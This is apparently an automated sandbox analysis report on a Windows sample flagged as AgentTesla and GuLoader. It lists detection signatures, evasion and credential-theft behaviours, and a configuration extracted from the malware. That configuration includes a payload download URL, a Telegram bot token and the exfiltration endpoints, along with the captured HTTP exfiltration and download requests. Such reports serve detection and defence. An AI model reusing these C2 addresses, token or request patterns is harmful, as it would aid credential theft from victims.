Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 623387
MD5: 2beb53482de8f6a713deb6fa9f9e7267
SHA1: 0959ea9b1697d980da699f8375f91ca1df8e0f56
SHA256: 7ac7845621113c87e927eb2b582af6f1809e4866e4ee0f089dd1c6ab0042dd27

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Contains functionality to enumerate device drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin Avira URL Cloud: Label: malware
Source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://msdvc.com/oluwa_RcQBQnZSyJ230.bin"}
Source: conhost.exe.8960.7.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "765471673", "Chat URL": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument"}
Source: CasPol.exe.8436.6.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendMessage"}
Source: file.exe Virustotal: Detection: 26%
Source: file.exe ReversingLabs: Detection: 21%
Source: msdvc.com Virustotal: Detection: 5%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20707A18 CryptUnprotectData, 6_2_20707A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20708018 CryptUnprotectData, 6_2_20708018
Source: file.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 119.18.54.23:443 -> 192.168.11.20:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49749 version: TLS 1.2
Source: file.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb, source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\Config_Editor\obj\Release\ConfigXML_ScenarioProfile.pdb source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr
Source: Binary string: MsMpCom.pdb source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: Binary string: MsMpCom.pdbGCTL source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmp, MsMpCom.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C13
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040683D FindFirstFileW,FindClose, 1_2_0040683D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Malware configuration extractor URLs: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542f
    Host: api.telegram.org
    Content-Length: 1026
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: msdvc.com
    Cache-Control: no-cache
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://VrxAgw.com
Source: CasPol.exe, 00000006.00000002.9109123482.000000001D620000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: CasPol.exe, 00000006.00000003.5392755062.000000000109B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9085023416.000000000109B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: file.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%t-
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000006.00000002.9084920073.0000000001092000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.5392527483.0000000001092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: CasPol.exe, 00000006.00000002.9108904236.000000001D60C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocumentdocument-----
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000006.00000003.4395944498.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.9108808385.000000001D606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1ktMAcOA2o.net
Source: CasPol.exe, 00000006.00000002.9108499877.000000001D5D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d1ktMAcOA2o.nett-
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/
Source: CasPol.exe, 00000006.00000002.9083705847.0000000001018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/j
Source: CasPol.exe, 00000006.00000003.5393803213.000000000106A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdvc.com/oluwa_RcQBQnZSyJ230.bin
Source: CasPol.exe, 00000006.00000002.9108033528.000000001D577000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, ConfigXML_ScenarioProfile.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000006.00000002.9107245164.000000001D4D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: msdvc.com
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown HTTP traffic detected: POST /bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8da3291ed28542f
    Host: api.telegram.org
    Content-Length: 1026
    Expect: 100-continue
    Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_004056A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00406BFE 1_2_00406BFE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_70AC1BFF 1_2_70AC1BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BB61C 1_2_033BB61C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFAFD 1_2_033AFAFD
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AEDE0 1_2_033AEDE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCC1C 1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B573A 1_2_033B573A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFF06 1_2_033AFF06
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BDB04 1_2_033BDB04
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B175E 1_2_033B175E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BF35C 1_2_033BF35C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1356 1_2_033B1356
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2F4A 1_2_033B2F4A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2BBE 1_2_033B2BBE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2B8D 1_2_033B2B8D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B138C 1_2_033B138C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCB81 1_2_033BCB81
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5BFF 1_2_033B5BFF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B53CE 1_2_033B53CE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B57C6 1_2_033B57C6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AEE3E 1_2_033AEE3E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1632 1_2_033B1632
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B562F 1_2_033B562F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2E62 1_2_033B2E62
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B12AA 1_2_033B12AA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B629A 1_2_033B629A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B568A 1_2_033B568A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFE86 1_2_033AFE86
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B22FB 1_2_033B22FB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B4EE7 1_2_033B4EE7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B591F 1_2_033B591F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2D7E 1_2_033B2D7E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B156E 1_2_033B156E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFD46 1_2_033AFD46
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B61A9 1_2_033B61A9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2DFC 1_2_033B2DFC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFDEE 1_2_033AFDEE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B61CF 1_2_033B61CF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFC1E 1_2_033AFC1E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1412 1_2_033B1412
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B1815 1_2_033B1815
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B5876 1_2_033B5876
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BE04B 1_2_033BE04B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033AFC91 1_2_033AFC91
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B2CFE 1_2_033B2CFE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BD0E8 1_2_033BD0E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B50E8 1_2_033B50E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033B14C3 1_2_033B14C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A9890 6_2_1D2A9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A6B63 6_2_1D2A6B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2AA160 6_2_1D2AA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1D2A9548 6_2_1D2A9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEBFA8 6_2_1FCEBFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEF548 6_2_1FCEF548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCE3D88 6_2_1FCE3D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_1FCEC528 6_2_1FCEC528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20630040 6_2_20630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063BEF0 6_2_2063BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20638BE8 6_2_20638BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_206337A0 6_2_206337A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_206364B0 6_2_206364B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063D508 6_2_2063D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20632320 6_2_20632320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2063373F 6_2_2063373F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_20703018 6_2_20703018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070AD36 6_2_2070AD36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207055F8 6_2_207055F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207005A9 6_2_207005A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070DED0 6_2_2070DED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070EF70 6_2_2070EF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070CF20 6_2_2070CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_207054F8 6_2_207054F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 6_2_2070D2C0 6_2_2070D2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process Stats: CPU usage > 98%
Source: file.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\file.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 1D2AD148 appears 53 times
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BCC1C NtAllocateVirtualMemory, 1_2_033BCC1C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_033BE873 NtProtectVirtualMemory, 1_2_033BE873
Source: file.exe, 00000001.00000003.4043105760.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameConfigXML_ScenarioProfile.dllT vs file.exe
Source: file.exe, 00000001.00000003.4045308287.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpCom.dllj% vs file.exe
Source: file.exe Static PE information: invalid certificate
Source: file.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@2/2
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: file.exe Virustotal: Detection: 26%
Source: file.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004034F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
